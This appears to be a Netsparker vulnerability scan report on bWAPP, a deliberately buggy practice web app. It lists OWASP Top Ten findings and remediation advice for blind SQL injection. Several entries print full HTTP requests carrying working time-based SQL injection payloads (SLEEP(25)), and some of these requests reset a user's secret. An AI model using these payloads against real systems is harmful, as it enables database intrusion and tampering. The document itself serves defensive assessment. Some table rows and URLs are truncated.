VULNERABILITIES BY OWASP TOP TEN 2013 - MME BVBA


OWASP TOP TEN 2013 SCAN REPORT SUMMARY

TARGET URL: http://itsecgames.com/bWAPP/aim.php
SCAN DATE: 4/11/2014 15:00:06
REPORT DATE: 4/11/2014 17:12:45
SCAN DURATION: 01:31:06
Total Requests: 177058
Average Speed: 32,39 req/sec.
167105647 identified confirmed

SCAN EXPLANATION
This report is generated based on OWASP Top Ten 2013 classification. There are 64 more vulnerabilities that are not shown below. Please take a look at the detailed scan report to see them.

[Severity chart: critical / informational]

167 vulnerabilities listed in OWASP Top Ten 2013 found on this web site.

VULNERABILITIES BY OWASP TOP TEN 2013

OWASP A1 - Injection

URL | Severity | Vulnerability
ellshock.sh | Critical | Bash Command Injection Vulnerability (Shellshock Bug)
/bWAPP/commandi.php | Critical | Command Injection
/bWAPP/commandi.php | Critical | Blind Command Injection
/bWAPP/commandi_blind.php | Critical | Blind Command Injection
/bWAPP/phpi.php | Critical | Remote Code Evaluation (PHP)
/bWAPP/rlfi.php | Critical | Remote Code Evaluation via Local File Inclusion (PHP)
/bWAPP/rlfi.php | Critical | Remote File Inclusion
/bWAPP/sqli_1.php | Critical | [Probable] SQL Injection
/bWAPP/sqli_1.php | Critical | Boolean Based SQL Injection
/bWAPP/sqli_1.php | Critical | SQL Injection
/bWAPP/sqli_1.php | Critical | Blind SQL Injection
/bWAPP/sqli_10-2.php | Critical | [Probable] SQL Injection
/bWAPP/sqli_10-2.php | Critical | Boolean Based SQL Injection
/bWAPP/sqli_10-2.php | Critical | Blind SQL Injection
/bWAPP/sqli_13.php | Critical | SQL Injection
/bWAPP/sqli_13.php | Critical | [Probable] SQL Injection
/bWAPP/sqli_13.php | Critical | Boolean Based SQL Injection
/bWAPP/sqli_13.php | Critical | Blind SQL Injection
/bWAPP/sqli_15.php | Critical | Blind SQL Injection
/bWAPP/sqli_16.php | Critical | Blind SQL Injection
/bWAPP/sqli_16.php | Critical | [Probable] SQL Injection
/bWAPP/sqli_16.php | Critical | SQL Injection
/bWAPP/sqli_2.php | Critical | [Probable] SQL Injection
/bWAPP/sqli_2.php | Critical | Blind SQL Injection
/bWAPP/sqli_2.php | Critical | SQL Injection
/bWAPP/sqli_2.php | Critical | Boolean Based SQL Injection
/bWAPP/sqli_3.php | Critical | Boolean Based SQL Injection
/bWAPP/sqli_3.php | Critical | [Probable] SQL Injection
/bWAPP/sqli_3.php | Critical | Blind SQL Injection
/bWAPP/sqli_3.php | Critical | SQL Injection
/bWAPP/sqli_3.php | Critical | Blind SQL Injection
/bWAPP/sqli_3.php | Critical | [Probable] SQL Injection
/bWAPP/sqli_3.php | Critical | SQL Injection
/bWAPP/sqli_4.php | Critical | Blind SQL Injection
/bWAPP/sqli_4.php | Critical | Boolean Based SQL Injection
/bWAPP/sqli_5.php | Critical | Blind SQL Injection
/bWAPP/sqli_6.php | Critical | [Probable] SQL Injection
/bWAPP/sqli_6.php | Critical | Boolean Based SQL Injection
/bWAPP/sqli_6.php | Critical | Blind SQL Injection
/bWAPP/sqli_6.php | Critical | SQL Injection
/bWAPP/sqli_7.php | Critical | SQL Injection
/bWAPP/sqli_7.php | Critical | [Probable] SQL Injection
/bWAPP/sqli_7.php | Critical | Blind SQL Injection
/bWAPP/sqli_8-2.php | Critical | [Probable] SQL Injection
/bWAPP/sqli_8-2.php | Critical | SQL Injection
/bWAPP/sqli_8-2.php | Critical | Blind SQL Injection
/bWAPP/sqli_8-2.php | Critical | [Probable] SQL Injection
/bWAPP/sqli_8-2.php | Critical | Blind SQL Injection
/bWAPP/ssii.shtml | Critical | [Possible] Command Injection
/bWAPP/ssii.shtml | Critical | [Possible] Command Injection
/bWAPP/ws_soap.php | Critical | Blind SQL Injection
/bWAPP/ws_soap.php | Critical | [Probable] SQL Injection
/bWAPP/xss_login.php | Critical | SQL Injection
/bWAPP/xss_login.php | Critical | [Probable] SQL Injection
/bWAPP/xss_login.php | Critical | [Probable] SQL Injection
/bWAPP/xss_login.php | Critical | Boolean Based SQL Injection
/bWAPP/xss_login.php | Critical | SQL Injection
/bWAPP/xss_login.php | Critical | Blind SQL Injection
/bWAPP/xss_login.php | Critical | Blind SQL Injection
/bWAPP/xxe-2.php | Critical | [Probable] SQL Injection
/bWAPP/xxe-2.php | Critical | Blind SQL Injection
/bWAPP/xxe-2.php | Critical | Blind SQL Injection
/bWAPP/xxe-2.php | Critical | [Probable] SQL Injection
/bWAPP/xxe-2.php | Critical | SQL Injection

URL | Severity | Vulnerability
/bWAPP/http_response_splitting.php | Medium | Open Redirection
/bWAPP/iframei.php | Medium | Frame Injection
/bWAPP/unvalidated_redir_fwd_1.php | Medium | Open Redirection
/bWAPP/unvalidated_redir_fwd_2.php | Medium | Open Redirection

OWASP A3 - Cross-Site Scripting (XSS)

URL | Severity | Vulnerability
/bWAPP/csrf_3.php | Important | Cross-site Scripting
/bWAPP/directory_traversal_2.php | Important | Cross-site Scripting
/bWAPP/hpp-2.php | Important | Cross-site Scripting
/bWAPP/htmli_current_url.php | Important | Cross-site Scripting
/bWAPP/htmli_get.php | Important | Cross-site Scripting
/bWAPP/htmli_get.php | Important | Cross-site Scripting
/bWAPP/htmli_post.php | Important | Cross-site Scripting
/bWAPP/htmli_post.php | Important | Cross-site Scripting
/bWAPP/htmli_stored.php | Important | Permanent Cross-site Scripting
/bWAPP/htmli_stored.php | Important | Cross-site Scripting
/bWAPP/iframei.php | Important | Cross-site Scripting
/bWAPP/iframei.php | Important | Cross-site Scripting
/bWAPP/iframei.php | Important | Cross-site Scripting
/bWAPP/insecure_direct_object_ref_1.php | Important | Cross-site Scripting
/bWAPP/rlfi.php | Important | Permanent Cross-site Scripting
/bWAPP/rlfi.php | Important | Cross-site Scripting
/bWAPP/rlfi.php | Important | Cross-site Scripting via Remote File Inclusion
/bWAPP/sqli_1.php | Important | Cross-site Scripting
/bWAPP/sqli_12.php | Important | Cross-site Scripting
/bWAPP/sqli_12.php | Important | Permanent Cross-site Scripting
/bWAPP/sqli_12.php | Important | [Possible] Permanent Cross-site Scripting
/bWAPP/sqli_13.php | Important | Cross-site Scripting
/bWAPP/sqli_16.php | Important | Cross-site Scripting
/bWAPP/sqli_2.php | Important | Cross-site Scripting
/bWAPP/sqli_3.php | Important | Cross-site Scripting
/bWAPP/sqli_3.php | Important | Cross-site Scripting
/bWAPP/sqli_6.php | Important | Cross-site Scripting
/bWAPP/sqli_7.php | Important | Cross-site Scripting
/bWAPP/sqli_7.php | Important | Permanent Cross-site Scripting
/bWAPP/sqli_8-2.php | Medium | [Possible] Cross-site Scripting
/bWAPP/sqli_8-2.php | Medium | [Possible] Cross-site Scripting
/bWAPP/ssii.shtml | Important | Permanent Cross-site Scripting
/bWAPP/ssii.shtml | Important | Cross-site Scripting
/bWAPP/ssii.shtml | Important | Cross-site Scripting
/bWAPP/ws_soap.php/%22ns=%22netsparker(0x0003FA) | Important | Cross-site Scripting
/bWAPP/xss_ajax_1-2.php | Medium | [Possible] Cross-site Scripting
/bWAPP/xss_ajax_2-2.php | Important | Cross-site Scripting
/bWAPP/xss_back_button.php | Important | Cross-site Scripting
/bWAPP/xss_eval.php | Important | Cross-site Scripting
/bWAPP/xss_get.php | Important | Cross-site Scripting
/bWAPP/xss_get.php | Important | Cross-site Scripting
/bWAPP/xss_href-2.php | Important | Cross-site Scripting
/bWAPP/xss_json.php | Important | Cross-site Scripting
/bWAPP/xss_login.php | Important | Cross-site Scripting
/bWAPP/xss_login.php | Important | Cross-site Scripting
/bWAPP/xss_php_self.php/%22onload=%22netsparker(9) | Important | Cross-site Scripting
/bWAPP/xss_php_self.php | Important | Cross-site Scripting
/bWAPP/xss_php_self.php | Important | Cross-site Scripting
/bWAPP/xss_post.php | Important | Cross-site Scripting
/bWAPP/xss_post.php | Important | Cross-site Scripting
/bWAPP/xss_referer.php | Important | Cross-site Scripting
/bWAPP/xss_stored_1.php | Important | Cross-site Scripting
/bWAPP/xss_stored_1.php | Important | Permanent Cross-site Scripting
/bWAPP/xss_stored_3.php | Important | Cross-site Scripting
/bWAPP/xxe-2.php | Medium | [Possible] Cross-site Scripting
/bWAPP/xxe-2.php | Medium | [Possible] Cross-site Scripting

OWASP A4 - Insecure Direct Object References

URL | Severity | Vulnerability
/bWAPP/directory_traversal_1.php | Important | Local File Inclusion
/bWAPP/directory_traversal_1.php | Important | [Possible] Local File Inclusion
/bWAPP/rlfi.php | Important | Local File Inclusion

OWASP A5 - Security Misconfiguration

URL | Severity | Vulnerability
in/phpinfo.php | Low | Information Disclosure (phpinfo())
/bWAPP/admin/phpinfo.php/%20ns=netsparker(0x00316E) | Low | Information Disclosure (phpinfo())
/bWAPP/admin/phpinfo.php/%22ns=%22netsparker(0x00316C) | Low | Information Disclosure
522netsparker%25280x003173%2529 | Low | Information Disclosure (phpinfo())
/bWAPP/admin/phpinfo.php/'ns='netsparker(0x00316D) | Low | Information Disclosure (phpinfo())
/bWAPP/aim | Low | Apache MultiViews Enabled
/bWAPP/config.inc | Medium | [Possible] Source Code Disclosure (PHP)
/bWAPP/directory_traversal_1.php | Medium | [Possible] Source Code Disclosure (PHP)
/bWAPP/directory_traversal_2.php | Low | Programming Error Message
/bWAPP/images/ | Low | OPTIONS Method Enabled
/bWAPP/images/ | Information | Directory Listing (Apache)
/bWAPP/information_disclosure_1.php | Low | Information Disclosure (phpinfo())
/bWAPP/information_disclosure_1.php/%20ns=netsparker(0x0003D7) | Low | Information Disclosure (phpinfo())
/bWAPP/information_disclosure_1.php/%22ns=%22netsparker(0x0003BC) | Low | Information Disclosure (phpinfo())
/bWAPP/information disclosure 9 | Low | Information Disclosure (phpinfo())
/bWAPP/information_disclosure_1.php/'ns='netsparker(0x0003CB) | Low | Information Disclosure
ion | | [Possible] Database Connection
| | [Possible] Source Code Disclosure (PHP)
/bWAPP/phpinfo.php | Low | Information Disclosure (phpinfo())
/bWAPP/phpinfo.php/%20ns=netsparker(0x00041F) | Low | Information Disclosure (phpinfo())
/bWAPP/phpinfo.php/%22ns=%22netsparker(0x000409) | Low | Information Disclosure
sparker%25280x000421%2529 | Low | Information Disclosure (phpinfo())
/bWAPP/phpinfo.php/'ns='netsparker(0x000414) | Low | Information Disclosure (phpinfo())
/bWAPP/portal.bak | Medium | [Possible] Source Code Disclosure (PHP)
/bWAPP/sm_mitm_1.php | Low | Autocomplete Enabled
/bWAPP/sm_mitm_1.php | Information | Autocomplete Enabled (Password Field)
/bWAPP/smgmt_cookies_secure.php | Low | Cookie Not Marked as HttpOnly
/bWAPP/sqli_1.php | Low | Database Error Message Disclosure
/bWAPP/sqli_1.php | Important | Database User Has Admin Privileges

OWASP A6 - Sensitive Data Exposure

URL | Severity | Vulnerability
/bWAPP/sqli_3.php | Important | Password Transmitted over HTTP
/bWAPP/xmli_1.php | Medium | Password Transmitted over Query String

OWASP A7 - Missing Function Level Access Control

URL | Severity | Vulnerability
w | | [Possible] Backup File Disclosure
/bWAPP/portal.bak | Important | Backup Source Code Detected

OWASP A8 - Cross-Site Request Forgery

URL | Severity | Vulnerability
| | [Possible] Cross-site Request Forgery Detected
/bWAPP/sqli_3.php | Low | [Possible] Cross-site Request Forgery in Login Form Detected

OWASP A9 - Using Components with Known Vulnerabilities

URL | Severity | Vulnerability
php | Information | Out-of-date Version (Apache)
/bWAPP/aim.php | Information | Out-of-date Version (PHP)
/bWAPP/aim.php | Information | Out-of-date Version (OpenSSL)
/bWAPP/sqli_1.php | Important | Out-of-date Version (MySQL)
/bWAPP/ws_soap.php | Information | Out-of-date Version (NuSOAP)

1. Blind SQL Injection
19 TOTAL | CRITICAL | CONFIRMED 19

Netsparker identified a blind SQL injection, which occurs when data input by a user is interpreted as an SQL command rather than as normal data by the backend database.

This is an extremely common vulnerability and its successful exploitation can have critical implications.

Netsparker confirmed the vulnerability by executing a test SQL query on the backend database. In these tests, SQL injection was not obvious, but the different responses from the page based on the injection test allowed us to identify and confirm the SQL injection.

Impact
Depending on the backend database, the database connection settings, and the operating system, an attacker can mount one or more of the following attacks successfully:
- Reading, updating and deleting arbitrary data or tables from the database
- Executing commands on the underlying operating system

Actions to Take
1. See the remedy for solution.
2. If you are not using a database access layer (DAL), consider using one. This will help you centralize the issue. You can also use ORM (object relational mapping). Most of the ORM systems use only parameterized queries and this can solve the whole SQL injection problem.
3. Locate all dynamically generated SQL queries and convert them to parameterized queries. (If you decide to use a DAL/ORM, change all legacy code to use these new libraries.)
4. Use your web logs and application logs to see if there were any previous but undetected attacks to this resource.

Remedy
A robust method for mitigating the threat of SQL injection-based vulnerabilities is to use parameterized queries (prepared statements). Almost all modern languages provide built-in libraries for this. Wherever possible, do not create dynamic SQL queries or SQL queries with string concatenation.

Required Skills for Successful Exploitation
There are numerous freely available tools to exploit SQL injection vulnerabilities. This is a complex area with many dependencies; however, it should be noted that the numerous resources available in this area have raised both attacker awareness of the issues and their ability to discover and leverage them. SQL injection is one of the most common web application vulnerabilities.

External References
OWASP SQL injection
SQL injection Cheatsheet

Remedy References
MSDN - Protect From SQL injection in ASP.NET

Classification
OWASP 2013-A1

1.1. /bWAPP/sqli_10-2.php CONFIRMED
http://itsecgames.com/bWAPP/sqli_10-2.php?title=-1%27 or 1%3d(SELECT 1 FROM (SELECT

Parameters
Parameter | Type | Value
title | GET | -1' or 1=(SELECT 1 FROM (SELECT SLEEP(25))A)+'

Request
GET /bWAPP/sqli_10-2.php?title=-1%27 or 1%3d(SELECT 1 FROM (SELECT SLEEP(25))A)%2b%27 HTTP/1.1
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept: application/json, text/javascript, */*; q=0.01
Referer: http://itsecgames.com/bWAPP/sqli_10-1.php
X-Requested-With: XMLHttpRequest
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: itsecgames.com
Cookie: PHPSESSID=0f025854e260210551fcb751d5b81388; security_level=0; movie_genre=action
Accept-Encoding: gzip, deflate

Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Date: Tue, 04 Nov 2014 14:34:44 GMT
Pragma: no-cache
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Content-Length: 2519
Content-Type: text/json; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT

[{"0":"1","id":"1","1":"G.I. Joe: Retaliation","title":"G.I. Joe: Retaliation","2":"2013","release braCommander","main character":"Cobra "100","tickets stock":"100"},{"0":"2","id":"2","1":"Iron Man","title":"IronMan","2":"2008","release ny Stark","main 371746","6":"53","tickets stock":"53"},{"0":"3","id":"3","1":"Man of Steel","title":"Man ofSteel","2":"2013","release ark Kent","main 770828","6":"78","tickets stock":"78"},{"0":"4","id":"4","1":"Terminator ","release hn Connor","main 0438488","6":"100","tickets stock":"100"},{"0":"5","id":"5","1":"The Amazing Spider-Man","title":"The Amazing SpiderMan","2":"2012","release ter Parker","main t0948470","6":"13","tickets stock":"13"},{"0":"6","id":"6","1":"The Cabin in the Woods","title":"The Cabin in theWoods","2":"2011","release me zombies","main t1259521","6":"666","tickets stock":"666"},{"0":"7","id":"7","1":"The Dark Knight Rises","title":"The Dark Knight Rises","2

1.2.

Parameters
Parameter | Type | Value
login[1]/text()[1] | XML Parameter | '+(SELECT 1 FROM (SELECT SLEEP(25))A)+'
/reset[1]/secret[1]/text()[1] | XML Parameter | Any bugs?

Request
POST /bWAPP/xxe-2.php HTTP/1.1
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept: */*
Origin: http://itsecgames.com
Referer: http://itsecgames.com/bWAPP/insecure_direct_object_ref_3.php
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: itsecgames.com
Cookie: PHPSESSID=0f025854e260210551fcb751d5b81388; security_level=0; movie_genre=%2FbWAPP%2Fxss_stored_2.php
Accept-Encoding: gzip, deflate
Content-Length: 95
Content-Type: text/xml; charset=utf-8

<reset><login>'+(SELECT 1 FROM (SELECT SLEEP(25))A)+'</login><secret>Any bugs?</secret></reset>

Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Date: Tue, 04 Nov 2014 15:13:55 GMT
Pragma: no-cache
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Content-Length: 64
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT

'+(SELECT 1 FROM (SELECT SLEEP(25))A)+''s secret has been reset!

1.3. /bWAPP/sqli_6.php CONFIRMED
http://itsecgames.com/bWAPP/sqli_6.php

Parameters
Parameter | Type | Value
title | POST | -1' or 1=(SELECT 1 FROM (SELECT SLEEP(25))A)+'
action | POST | search

Request
POST /bWAPP/sqli_6.php HTTP/1.1
Cache-Control: no-cache
Referer: http://itsecgames.com/bWAPP/sqli_6.php
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: itsecgames.com
Cookie: PHPSESSID=0f025854e260210551fcb751d5b81388; security_level=0; movie_genre=action
Accept-Encoding: gzip, deflate
Content-Length: 74
Content-Type: application/x-www-form-urlencoded

title=-1%27 or 1%3d(SELECT 1 FROM (SELECT SLEEP(25))A)%2b%27&action=search

Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Date: Tue, 04 Nov 2014 14:14:51 GMT
Pragma: no-cache
Transfer-Encoding: chunked
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT

<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<!-- <link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects+Daughter"> -->
<link rel="stylesheet" type="text/css" href="stylesheets/stylesheet.css" media="screen" />
<link rel="shortcut icon" href="images/favicon.ico" type="image/x-icon" />
<!-- <script src="//html5shiv.googlecode.com/svn/trunk/html5.js"></script> -->
<script src="js/html5.js"></script>
<title>bWAPP - SQL Injection</title>
</head>
<body>
<header>
<h1>bWAPP</h1>
<h2>an extremely buggy web app !</h2>
</header>
<div id="menu">
<table>
<tr>
<td><a href="portal.php">Bugs</a></td>
<td><a href="password_change.php">Change Password</a></td>
<td><a href="user_extra.php">Create User</a></td>
<td><a href="security_level_set.php">Set Security Level</a></td>
<td><a href="reset.php" onclick="return confirm('All settings will be cleared. Are you sure?');">Reset</a></td>
<td><a href="credits.php">Credits</a></td>
<td><a href="http://itsecgames.blogspot.com" target="_blank">Blog</a></td>
<td><a href="logout.php" onclick="return confirm('Are you sure you want to leave?');">Logout</a></td>
<td><font color="red">Welcome Bee</font></td>
</tr>
</table>
</div>
<div id="main">
<h1>SQL Injection (POST/Search)</h1>
<form action="/bWAPP/sqli_6.php" method="POST">
<p><label for="title">Search for a movie:</label><i

1.4.

Parameters
Parameter | Type | Value
login[1]/text()[1] | XML Parameter | bee
/reset[1]/secret[1]/text()[1] | XML Parameter | '+(SELECT 1 FROM (SELECT SLEEP(25))A)+'

Request
POST /bWAPP/xxe-2.php HTTP/1.1
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept: */*
Origin: http://itsecgames.com
Referer: http://itsecgames.com/bWAPP/insecure_direct_object_ref_3.php
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: itsecgames.com
Cookie: PHPSESSID=0f025854e260210551fcb751d5b81388; security_level=0; movie_genre=%2FbWAPP%2Fxss_stored_2.php
Accept-Encoding: gzip, deflate
Content-Length: 89
Content-Type: text/xml; charset=utf-8

<reset><login>bee</login><secret>'+(SELECT 1 FROM (SELECT SLEEP(25))A)+'</secret></reset>

Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Date: Tue, 04 Nov 2014 15:16:47 GMT
Pragma: no-cache
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Content-Length: 28
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT

bee's secret has been reset!

1.5. /bWAPP/ws_soap.php CONFIRMED
http://itsecgames.com/bWAPP/ws_

Parameters
Parameter | Type | Value
[1]/soap:Body[1]/q1:get_tickets_stock[1]/title[1]/text()[1] | SOAP XML Parameter | '+(SELECT 1 FROM (SELECT SLEEP(25))A)+'

Request
POST /bWAPP/ws_soap.php HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
SOAPAction: "urn:tickets_stock#get_tickets_stock"
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: itsecgames.com
Cookie: PHPSESSID=0f025854e260210551fcb751d5b81388; security_level=0
Accept-Encoding: gzip, deflate
Content-Length: 624
Content-Type: text/xml; charset=utf-8

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/" xmlns:tns="urn:movie_service" xmlns:types="urn:movie_service/encodedTypes" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
<soap:Body soap:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<q1:get_tickets_stock xmlns:q1="urn:tickets_stock">
<title xsi:type="xsd:string">'+(SELECT 1 FROM (SELECT SLEEP(25))A)+'</title>
</q1:get_tickets_stock>
</soap:Body>
</soap:Envelope>

Response
HTTP/1.1 200 OK
Connection: Keep-Alive
Date: Tue, 04 Nov 2014 15:28:10 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
X-SOAP-Server: NuSOAP/0.9.5 (1.123)
Keep-Alive: timeout=15, max=80
Content-Length: 544
Content-Type: text/xml; charset=ISO-8859-1

<?xml version="1.0" encoding="ISO-8859-1"?>
<SOAP-ENV:Envelope SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/" xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/">
<SOAP-ENV:Body>
<ns1:get_tickets_stockResponse xmlns:ns1="urn:tickets_stock">
<tickets_stock xsi:nil="true" xsi:type="xsd:integer"/>
</ns1:get_tickets_stockResponse>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>

1.6. /bWAPP/sqli_8-2.php CONFIRMED
http://itsecgames.com/bWAPP/sqli_

Parameters
Parameter | Type | Value
[1]/text()[1] | XML Parameter | bee
/reset[1]/secret[1]/text()[1] | XML Parameter | '+(SELECT 1 FROM (SELECT SLEEP(25))A)+'

Request
POST /bWAPP/sqli_8-2.php HTTP/1.1
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept: */*
Origin: http://itsecgames.com
Referer: http://itsecgames.com/bWAPP/sqli_8-1.php
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: itsecgames.com
Cookie: PHPSESSID=0f025854e260210551fcb751d5b81388; security_level=0; movie_genre=action
Accept-Encoding: gzip, deflate
Content-Length: 89
Content-Type: text/xml; charset=utf-8

<reset><login>bee</login><secret>'+(SELECT 1 FROM (SELECT SLEEP(25))A)+'</secret></reset>

Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Date: Tue, 04 Nov 2014 14:46:31 GMT
Pragma: no-cache
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Content-Length: 28
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT

bee's secret has been reset!

1.7. /bWAPP/sqli_16.php CONFIRMED
http://itsecgames.com/bWAPP/sqli_16.php

Parameters
Parameter | Type | Value
login | POST | '+(SELECT 1 FROM (SELECT SLEEP(25))A)+'
password | POST | 3
form | POST | submit

Request
POST /bWAPP/sqli_16.php HTTP/1.1
Cache-Control: no-cache
Referer: http://itsecgames.com/bWAPP/sqli_16.php
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: itsecgames.com
Cookie: PHPSESSID=0f025854e260210551fcb751d5b81388; security_level=0; movie_genre=action
Accept-Encoding: gzip, deflate
Content-Length: 76
Content-Type: application/x-www-form-urlencoded

login=%27%2b(SELECT 1 FROM (SELECT SLEEP(25))A)%2b%27&password=3&form=submit

Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Date: Tue, 04 Nov 2014 14:25:29 GMT
Pragma: no-cache
Transfer-Encoding: chunked
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT

<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<!-- <link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects+Daughter"> -->
<link rel="stylesheet" type="text/css" href="stylesheets/stylesheet.css" media="screen" />
<link rel="shortcut icon" href="images/favicon.ico" type="image/x-icon" />
<!-- <script src="//html5shiv.googlecode.com/svn/trunk/html5.js"></script> -->
<script src="js/html5.js"></script>
<title>bWAPP - SQL Injection</title>
</head>
<body>
<header>
<h1>bWAPP</h1>
<h2>an extremely buggy web app !</h2>
</header>
<div id="menu">
<table>
<tr>
<td><a href="portal.php">Bugs</a></td>
<td><a href="password_change.php">Change Password</a></td>
<td><a href="user_extra.php">Create User</a></td>
<td><a href="security_level_set.php">Set Security Level</a></td>
<td><a href="reset.php" onclick="return confirm('All settings will be cleared. Are you sure?');">Reset</a></td>
<td><a href="credits.php">Credits</a></td>
<td><a href="http://itsecgames.blogspot.com" target="_blank">Blog</a></td>
<td><a href="logout.php" onclick="return confirm('Are you sure you want to leave?');">Logout</a></td>
<td><font color="red">Welcome Bee</font></td>
</tr>
</table>
</div>
<div id="main">
<h1>SQL Injection (Login Form/User)</h1>
<p>Enter your credentials.</p>
<form action="/bWAPP/sqli_16.php" method="POST">
<p><label for="login">Login:

1.8. /bWAPP/sqli_2.php CONFIRMED
http://itsecgames.com/bWAPP/sqli_2.php?action=go&movie=(SELECT 1 FROM (SELECT

Parameters
Parameter | Type | Value
movie | GET | (SELECT 1 FROM (SELECT SLEEP(25))A)

Request
GET /bWAPP/sqli_2.php?action=go&movie=(SELECT 1 FROM (SELECT SLEEP(25))A) HTTP/1.1
Cache-Control: no-cache
Referer: http://itsecgames.com/bWAPP/sqli_2.php
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: itsecgames.com
Cookie: PHPSESSID=0f025854e260210551fcb751d5b81388; security_level=0; movie_genre=action
Accept-Encoding: gzip, deflate

Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Date: Tue, 04 Nov 2014 14:11:52 GMT
Pragma: no-cache
Transfer-Encoding: chunked
